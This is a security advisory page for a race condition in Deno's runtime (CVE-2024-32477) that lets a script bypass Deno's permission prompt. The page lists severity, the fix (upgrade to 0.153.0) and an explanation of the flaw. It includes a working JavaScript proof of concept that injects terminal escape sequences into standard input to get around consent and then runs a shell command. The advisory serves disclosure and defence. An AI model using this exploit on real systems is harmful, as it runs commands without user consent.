Race Condition Affecting deno_runtime package, versions <0.153.0


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.34% (26th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-RUST-DENORUNTIME-6663931
  • published19 Apr 2024
  • disclosed18 Apr 2024
  • creditparrot409

Introduced: 18 Apr 2024

CVE-2024-32477  (opens in a new tab)
CWE-362  (opens in a new tab)

How to fix?

Upgrade deno_runtime to version 0.153.0 or higher.

Overview

Affected versions of this package are vulnerable to Race Condition between libc::tcflush(0, libc::TCIFLUSH) and reading from standard input. This manipulation allows appending data to the standard input, exploiting a race condition to bypass the permission policy and execute an unsafe action without user consent.

PoC

console.log('This module is in beta stage, press Enter if anything went wrong!')
setTimeout(async _=>{
    Deno.write(Deno.stdout.rid,(new TextEncoder()).encode('\x1b[$p'.repeat(2000)))
    Deno.read(Deno.stdin.rid,new Uint8Array(5))
    let cmd = new Deno.Command('id')
    console.log(new TextDecoder().decode((await cmd.output()).stdout))
},2000)

References

CVSS Base Scores

version 3.1